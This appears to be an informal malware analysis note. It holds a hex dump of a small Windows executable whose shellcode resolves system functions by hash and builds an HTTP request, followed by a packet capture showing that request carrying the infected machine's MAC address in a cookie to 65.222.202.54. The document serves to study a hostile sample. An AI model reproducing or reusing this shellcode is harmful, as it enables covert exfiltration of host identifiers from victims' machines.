0050 00 00 00 00 E0 00 03 01 0B 01 08 00 BC 03 00 00 ................

0060 00 00 00 00 00 00 00 00 60 01 00 00 60 01 00 00 ........`...`...

0070 1C 05 00 00 00 00 40 00 01 00 00 00 01 00 00 00 ...... @ .........

0080 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 ................

0090 1C 05 00 00 60 01 00 00 00 00 00 00 02 00 00 04 ....`...........

00A0 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 ................

00B0 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ................

00C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

00D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

00E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

00F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0100 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0110 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0130 00 00 00 00 00 00 00 00 2E 74 65 78 74 00 00 00 ......... text ...

0140 BC 03 00 00 60 01 00 00 BC 03 00 00 60 01 00 00 ....`.......`...

0150 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 ............ ..`

0160 60 FC E8 8A 00 00 00 60 89 E5 31 D2 64 8B 52 30 `......`.. 1 . d . R0

0170 8B 52 0C 8B 52 14 8B 72 28 0F B7 4A 26 31 FF 31 . R .. R .. r ( .. J & 1.1

0180 C0 AC 3C 61 7C 02 2C 20 C1 CF 0D 01 C7 E2 F0 52 .. < a | . , ....... R

0190 57 8B 52 10 8B 42 3C 01 D0 8B 40 78 85 C0 74 4A W. R .. B < ... @ x.. tJ

01A0 01 D0 50 8B 48 18 8B 58 20 01 D3 E3 3C 49 8B 34 .. P . H .. X ... < I.4

01B0 8B 01 D6 31 FF 31 C0 AC C1 CF 0D 01 C7 38 E0 75 ...1.1....... 8 . u

01C0 F4 03 7D F8 3B 7D 24 75 E2 58 8B 58 24 01 D3 66 .. } . ; } $u. X . X $.. f

01D0 8B 0C 4B 8B 58 1C 01 D3 8B 04 8B 01 D0 89 44 24 .. K . X ......... D $

01E0 24 5B 5B 61 59 5A 51 FF E0 58 5F 5A 8B 12 EB 86 $ [ [ aYZQ.. X_Z ....

01F0 05 5D 81 BD E9 02 00 00 47 45 54 20 75 70 8D 85 . ] ...... GET up..

0200 D1 02 00 00 50 68 4C 77 26 07 FF D5 85 C0 74 5E .... PhLw & ..... t ^

0210 8D 85 D8 02 00 00 50 68 4C 77 26 07 FF D5 85 C0 ...... PhLw & .....

0220 74 4C BB 90 01 00 00 29 DC 54 53 68 29 80 6B 00 tL..... ) . TSh ) . k .

0230 FF D5 01 DC 85 C0 75 36 50 50 50 50 40 50 40 50 ...... u6PPPP @ P @ P

0240 68 EA 0F DF E0 FF D5 31 DB F7 D3 39 C3 74 1F 89 h...... 1 ... 9 . t ..

0250 C3 6A 10 8D B5 E1 02 00 00 56 53 68 99 A5 74 61 . j ....... VSh .. ta

0260 FF D5 85 C0 74 1F FE 8D 89 00 00 00 75 E3 80 BD .... t ....... u ...

0270 4F 02 00 00 01 74 07 E8 3B 01 00 00 EB 05 E8 4D O.... t .. ; ...... M

0280 01 00 00 FF E7 B8 00 01 00 00 29 C4 89 E2 52 50 .......... ) ... RP

0290 52 68 B6 49 DE 01 FF D5 5F 81 C4 00 01 00 00 85 Rh. I ...._.......

02A0 C0 0F 85 F2 00 00 00 57 E8 F9 00 00 00 5E 89 CA ....... W ..... ^ ..

02B0 8D BD E9 02 00 00 E8 EB 00 00 00 4F 83 FA 20 7C ........... O .. |

02C0 05 BA 20 00 00 00 89 D1 56 F3 A4 B9 0D 00 00 00 .. ..... V .......

02D0 8D B5 C4 02 00 00 F3 A4 89 BD 4B 02 00 00 5E 56 .......... K ... ^ V

02E0 68 A9 28 34 80 FF D5 85 C0 0F 84 AA 00 00 00 66 h. ( 4 ........... f

02F0 8B 48 0A 66 83 F9 04 0F 82 9C 00 00 00 8D 40 0C . H . f .......... @ .

0300 8B 00 8B 08 8B 09 B8 00 01 00 00 50 89 E7 29 C4 ........... P .. ) .

0310 89 E6 57 56 51 51 68 48 72 D2 B8 FF D5 85 C0 81 .. WVQQhHr .......

0320 C4 04 01 00 00 0F B7 0F 83 F9 06 72 6C B9 06 00 ........... rl ...

0330 00 00 B8 10 00 00 00 29 C4 89 E7 89 CA D1 E2 50 ....... ) ....... P

0340 52 31 D2 8A 16 88 D0 24 F0 C0 E8 04 3C 09 77 04 R1.....$.... < . w .

0350 04 30 EB 02 04 37 88 07 47 88 D0 24 0F 3C 09 77 .0... 7 .. G ..$. < . w

0360 04 04 30 EB 02 04 37 88 07 47 46 E2 D4 59 29 CF .. 0 ... 7 .. GF .. Y ) .

0370 89 FE 58 01 C4 8B BD 4B 02 00 00 F3 A4 C6 85 4F .. X .... K ....... O

0380 02 00 00 01 E8 2E 00 00 00 31 C0 50 51 29 CF 4F ......... 1 . PQ ) . O

0390 57 53 68 C2 EB 38 5F FF D5 53 68 75 6E 4D 61 FF WSh.. 8 _.. ShunMa .

03A0 D5 E9 C8 FE FF FF 31 C9 F7 D1 31 C0 F2 AE F7 D1 ...... 1 ... 1 .....

03B0 49 C3 00 00 00 00 00 8D BD E9 02 00 00 E8 E4 FF I...............

03C0 FF FF 4F B9 4F 00 00 00 8D B5 75 02 00 00 F3 A4 .. O . O ..... u .....

03D0 8D BD E9 02 00 00 E8 CB FF FF FF C3 0D 0A 43 6F .............. Co

03E0 6E 6E 65 63 74 69 6F 6E 3A 20 6B 65 65 70 2D 61 nnection : keep - a

03F0 6C 69 76 65 0D 0A 41 63 63 65 70 74 3A 20 2A 2F live.. Accept : */

0400 2A 0D 0A 41 63 63 65 70 74 2D 45 6E 63 6F 64 69 * .. Accept - Encodi

0410 6E 67 3A 20 67 7A 69 70 0D 0A 0D 0A 00 83 C7 0E ng : gzip........

0420 31 C9 F7 D1 31 C0 F3 AE 4F FF E7 0D 0A 43 6F 6F 1 ... 1 ... O .... Coo

0430 6B 69 65 3A 20 49 44 3D 77 73 32 5F 33 32 00 49 kie : ID = ws2_32. I

0440 50 48 4C 50 41 50 49 00 02 00 00 50 41 DE CA 36 PHLPAPI.... PA .. 6

0450 47 45 54 20 2F 30 35 63 65 61 34 64 65 2D 39 35 GET / 05cea4de - 95

0460 31 64 2D 34 30 33 37 2D 62 66 38 66 2D 66 36 39 1d - 4037 - bf8f - f69

0470 30 35 35 62 32 37 39 62 62 20 48 54 54 50 2F 31 055b279bb HTTP / 1

0480 2E 31 0D 0A 48 6F 73 74 3A 20 00 00 00 00 00 00 .1.. Host : ......

0490 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

04A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

04B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

04C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

04D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

04E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

04F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0500 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0510 00 00 00 00 00 00 00 00 00 00 00 90 ............

# Faiyaaaaaa !!!!

# grab a PCAP :

https : //lh4.googleusercontent.com/-0wkNuNmGI7s/U-r58ZI8l3I/AAAAAAAAQec/e7jPTahuyO8/s1152/001.png

#headers

13 : 55 : 52.350640 IP 192.168.0.20.1065 > 65.222.202.54. http : Flags [ S ] , seq 4027180372 , win 65535 , options [ mss 1460 , nop , nop , sackOK ] , length 0

13 : 55 : 52.350691 IP 65.222.202.54. http > 192.168.0.20.1065 : Flags [ S. ] , seq 1594076372 , ack 4027180373 , win 14600 , options [ mss 1460 , nop , nop , sackOK ] , length 0

13 : 55 : 52.350916 IP 192.168.0.20.1065 > 65.222.202.54. http : Flags [ . ] , ack 1 , win 65535 , length 0

13 : 55 : 52.432742 IP 192.168.0.20.1065 > 65.222.202.54. http : Flags [ P. ] , seq 1 : 154 , ack 1 , win 65535 , length 153

13 : 55 : 52.432760 IP 65.222.202.54. http > 192.168.0.20.1065 : Flags [ . ] , ack 154 , win 15544 , length 0

13 : 55 : 52.432880 IP 192.168.0.20.1065 > 65.222.202.54. http : Flags [ F. ] , seq 154 , ack 1 , win 65535 , length 0

13 : 55 : 52.433010 IP 65.222.202.54. http > 192.168.0.20.1065 : Flags [ F. ] , seq 1 , ack 155 , win 15544 , length 0

13 : 55 : 52.433398 IP 192.168.0.20.1065 > 65.222.202.54. http : Flags [ . ] , ack 2 , win 65535 , length 0

# sent HTTP data :

00000000 47 45 54 20 2f 30 35 63 65 61 34 64 65 2d 39 35 GET / 05c ea4de - 95

00000010 31 64 2d 34 30 33 37 2d 62 66 38 66 2d 66 36 39 1d - 4037 - bf8f - f69

00000020 30 35 35 62 32 37 39 62 62 20 48 54 54 50 2f 31 055b279b b HTTP / 1

00000030 2e 31 0d 0a 48 6f 73 74 3a 20 39 32 31 37 30 32 .1.. Host : 921702

00000040 0d 0a 43 6f 6f 6b 69 65 3a 20 49 44 3d 30 30 32 .. Cookie : ID = 002

00000050 31 38 36 31 39 34 35 37 38 0d 0a 43 6f 6e 6e 65 18619457 8 .. Conne

00000060 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 ction : k eep - aliv

00000070 65 0d 0a 41 63 63 65 70 74 3a 20 2a 2f 2a 0d 0a e.. Accep t : * /*..

00000080 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 3a Accept-E ncoding:

00000090 20 67 7a 69 70 0d 0a 0d 0a gzip... .

#sent Mac Address data:

Source: 192.168.0.20:1065 -> 65.222.202.54:80

HTTP traffic Header contains sensitive information 00XXXXXXXXXX (macaddr):

- check mate -

----

Investigated by: